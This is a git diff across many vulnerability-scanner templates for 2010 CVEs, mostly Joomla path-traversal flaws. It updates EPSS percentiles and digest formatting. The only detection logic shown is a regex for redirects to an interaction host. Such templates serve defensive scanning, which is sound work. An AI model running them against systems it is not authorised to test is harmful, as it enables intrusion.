b/http/cves/2010/CVE-2010-1540.yaml index e453ff973a..7afbf81980 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72295 + epss-percentile: 0.72287 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index cf558ef192..5bde93e8a1 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00917 - epss-percentile: 0.81083 + epss-percentile: 0.81069 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -36,4 +36,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100acd36cb83e01543211adfb20ae41f0f21115d85a4adc5e6d209ef4e7d186c370022052383247ac7075d8a0f84651c4762dd50cb37a413524f9b14357f7f177ae246b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100acd36cb83e01543211adfb20ae41f0f21115d85a4adc5e6d209ef4e7d186c370022052383247ac7075d8a0f84651c4762dd50cb37a413524f9b14357f7f177ae246b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 38e245751e..38d6a989c8 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.84357 + epss-percentile: 0.84331 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009df6f94c02c4a3169e513574ab38705b1d1446c84d7482aed96e79e253b772cb022067bdd2303d87f52ea7e9967b3363beb9236c94cff79e9e89d6aa0abc7d3f6b90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009df6f94c02c4a3169e513574ab38705b1d1446c84d7482aed96e79e253b772cb022067bdd2303d87f52ea7e9967b3363beb9236c94cff79e9e89d6aa0abc7d3f6b90:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 94b748ba37..1f9a55096a 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90462 + epss-percentile: 0.90465 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022076f3ca92a865464666f396d43e26a3a12e8f92ab47dffe76d7e086728fafdd07022014300b200ca890fb7a8aa04604cf89e4cdfcfda638d84cc66fa71780cc3e011b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022076f3ca92a865464666f396d43e26a3a12e8f92ab47dffe76d7e086728fafdd07022014300b200ca890fb7a8aa04604cf89e4cdfcfda638d84cc66fa71780cc3e011b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index c405b9cdec..d6c3118a9d 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90462 + epss-percentile: 0.90465 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df926e59b38efa364995bda76557770bc7ceffa6e258ba74835e3b4300f54dc2022100e47dc9c5494274fe0ee25693fb7fc319d4c8d6fa5a135cc2e0889e8adf270e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100df926e59b38efa364995bda76557770bc7ceffa6e258ba74835e3b4300f54dc2022100e47dc9c5494274fe0ee25693fb7fc319d4c8d6fa5a135cc2e0889e8adf270e0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 80b6256085..0462e89d41 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.86444 + epss-percentile: 0.86455 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a990d2b43f0bfe8130bba3f14872db9f1da5fe765aedb49f0e41d0de83f8c2f10220607171dc29fef1a6f0317639e3d301c0aba1ef9ff91b9de25330312a01ff28d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a990d2b43f0bfe8130bba3f14872db9f1da5fe765aedb49f0e41d0de83f8c2f10220607171dc29fef1a6f0317639e3d301c0aba1ef9ff91b9de25330312a01ff28d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 5b46692a0b..30cafb24fa 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90553 + epss-percentile: 0.9055 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 5ae6dd7f20..2df9f1c108 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86548 + epss-percentile: 0.86555 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index ceeb06d66d..dd3a343361 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86548 + epss-percentile: 0.86555 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 14d3444be4..ec1da40806 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86773 + epss-percentile: 0.86775 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c15815a355de8163099d411c3adc54e268d084d9da126f650571708150368fc4022100b1f6f3053c363a482c74d62c5a56e718cb93479d27a0e2e1b2bf4892da5771b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c15815a355de8163099d411c3adc54e268d084d9da126f650571708150368fc4022100b1f6f3053c363a482c74d62c5a56e718cb93479d27a0e2e1b2bf4892da5771b8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 60033d84b0..9007a2dc5e 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86548 + epss-percentile: 0.86555 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index be88c5cc7b..15f4a1dd2b 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index fd5460a5f3..d8d2376956 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86464 + epss-percentile: 0.86475 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 34f1b85cea..713d1331f7 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d5dbf966fdb3260bd30ef5ecd66f1441c5124c66748100d646a84c266e8da79e02200178d7576f77824788011e9757f760233494900f8920dda1665450ad81809154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d5dbf966fdb3260bd30ef5ecd66f1441c5124c66748100d646a84c266e8da79e02200178d7576f77824788011e9757f760233494900f8920dda1665450ad81809154:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 409c5fda34..e09349e263 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86235 + epss-percentile: 0.86244 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index d6dce2b68e..7e95e72c87 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 30e0388d5c..8ee5fec444 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87399 + epss-percentile: 0.87394 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022001b9311355cbea1d25e95015036e7746de29574d2d3a9aab60c87bf4b7f764c1022013e5c7100c900d2b956a6de8da216ae32ac1303de946944b4d4479b23797d480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022001b9311355cbea1d25e95015036e7746de29574d2d3a9aab60c87bf4b7f764c1022013e5c7100c900d2b956a6de8da216ae32ac1303de946944b4d4479b23797d480:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index baf92f577a..ccd8d43972 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1858 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83238 + epss-percentile: 0.8323 cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 5734755303..45b964e5ec 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1870 cwe-id: CWE-917 epss-score: 0.05379 - epss-percentile: 0.92323 + epss-percentile: 0.9231 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index f153fdb6b7..91b060c3d6 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.8377 + epss-percentile: 0.83755 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index df0da7f1c6..170a9a4ab1 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0775d755b108f2194591e627c16cda4317631ff764bebc2a03cac32d509ef980221008cb46ad7358b17fc2249b0c860e1c1913d06135d2b377529dd08129b4a9aba95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b0775d755b108f2194591e627c16cda4317631ff764bebc2a03cac32d509ef980221008cb46ad7358b17fc2249b0c860e1c1913d06135d2b377529dd08129b4a9aba95:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index b8c64f05bb..40c1346ada 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 584df2e3aa..4027116c84 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92527 + epss-percentile: 0.92521 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 29f01b439e..d0205b4f08 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92527 + epss-percentile: 0.92521 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 9d6f2476fe..bf460abb10 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86235 + epss-percentile: 0.86244 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3b1dbeceb6..f77bade654 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92723 + epss-percentile: 0.92714 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index d214290fda..d2dfbb579d 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86235 + epss-percentile: 0.86244 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 4e124fcfb7..9e93826486 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220422440505d77c83be259e102b5d7dfcf92770f440c6fa8b3bf839c8551899a5502204965f6dabbeb6e0e0114add0eb81c36990b159a40803ab1c3a7f81b3cf86ef69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220422440505d77c83be259e102b5d7dfcf92770f440c6fa8b3bf839c8551899a5502204965f6dabbeb6e0e0114add0eb81c36990b159a40803ab1c3a7f81b3cf86ef69:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 4e9022222f..d01cba4c57 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220109da9018bc117ad33f3d619545b8a06091019f959029cbcc137720469a33081022100b629343353fa1f02644609749b3c9cb3e2f01aa6699c164132cec33697c1cf9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220109da9018bc117ad33f3d619545b8a06091019f959029cbcc137720469a33081022100b629343353fa1f02644609749b3c9cb3e2f01aa6699c164132cec33697c1cf9b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index f0f6479d8b..2f69a168a9 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1980 cwe-id: CWE-22 epss-score: 0.02401 - epss-percentile: 0.88729 + epss-percentile: 0.88731 cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 7cf4278627..a14ea271ac 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1981 cwe-id: CWE-22 epss-score: 0.00656 - epss-percentile: 0.77187 + epss-percentile: 0.77171 cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 85a116a169..2e3faac317 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008587c366d63a392d3a482bc7fe64827d6436a2d3832ae902a8cba5554388ee8f02207523b4bf87cee5355fb193560a8d12ff154915da5e03b61b70fa5810169cabe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008587c366d63a392d3a482bc7fe64827d6436a2d3832ae902a8cba5554388ee8f02207523b4bf87cee5355fb193560a8d12ff154915da5e03b61b70fa5810169cabe9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 52cb6e949f..f728daa5da 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1983 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86804 + epss-percentile: 0.86806 cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207695997ea1a65db6b9fc751dc15960467d5a94248154c64325dae74f79ab9817022100900e0305a580817599ca0dc068250fa37427007d3e0c4fac4954773612a9e5f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207695997ea1a65db6b9fc751dc15960467d5a94248154c64325dae74f79ab9817022100900e0305a580817599ca0dc068250fa37427007d3e0c4fac4954773612a9e5f7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 22ff0f2785..b053dca4a6 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-2033 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018cc93e171a65e63ee3b2a3a2ff3c30aaabebe0d2af8c1cfca146db196934fbe022100d3b756431bed5dbb4965c338c603b2d33553ba12506a2766b2ddd45fd0fdc680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022018cc93e171a65e63ee3b2a3a2ff3c30aaabebe0d2af8c1cfca146db196934fbe022100d3b756431bed5dbb4965c338c603b2d33553ba12506a2766b2ddd45fd0fdc680:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 4194b56fe1..1086a29ef4 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2034 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.7837 + epss-percentile: 0.78361 cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 941b7ae37d..3ea719fb18 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2035 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.7837 + epss-percentile: 0.78361 cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 19f5eb5a16..931fa1aa1f 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.7837 + epss-percentile: 0.78361 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index d8b15038b8..6a85723bf4 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.7837 + epss-percentile: 0.78361 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 760229923e..0ffda9f04d 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86235 + epss-percentile: 0.86244 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 0d80c6ab7e..3ab1f657f4 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90553 + epss-percentile: 0.9055 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 66675b9651..0acd3e258d 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86772 + epss-percentile: 0.86774 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203fa21b362704fb260199efce38643f876b3a1351ad41c9db53a0357bff87c048022100c9994a9f92359d5f3054bf599fc459b66ed5952b857c947df054e0f6e6620b82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203fa21b362704fb260199efce38643f876b3a1351ad41c9db53a0357bff87c048022100c9994a9f92359d5f3054bf599fc459b66ed5952b857c947df054e0f6e6620b82:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index c212cd191d..7999b97e78 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -17,7 +17,7 